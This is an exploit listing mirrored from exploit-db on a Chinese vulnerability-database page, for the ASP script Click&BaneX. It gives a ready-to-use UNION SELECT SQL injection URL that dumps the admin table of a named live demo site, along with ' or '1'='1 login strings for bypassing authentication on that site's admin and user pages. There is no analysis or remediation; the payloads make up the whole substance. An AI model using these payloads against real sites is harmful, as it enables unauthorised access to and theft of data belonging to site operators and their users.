Click&BaneX - Multiple SQL Injections

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057032 漏洞类型
发布时间 2008-12-15 更新时间 2008-12-15
CVE编号 N/A CNNVD-ID N/A
漏洞平台 ASP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7484
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Click&BaneX
#download : null
#Demo     :  http://icash.ch/ClickAndBanexDemo/user/  %00 http://icash.ch/ClickAndBanexDemo/admin/

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp?user=wd2505&ID=0+union+select+1,2,3,4,5,6,7,9,10,11,12,13,15,16,17+from+admin%00


##########################################################################

--=[AUTH BYPASS]=--

-----ADMIN PAGE----
http://icash.ch/ClickAndBanexDemo/admin/admin_menu.asp

USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


-----USER PAGE----
http://icash.ch/ClickAndBanexDemo/user/user_menu.asp
USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


#Greetz For My Best Friend ZIGMA

###########################################################################

# milw0rm.com [2008-12-15]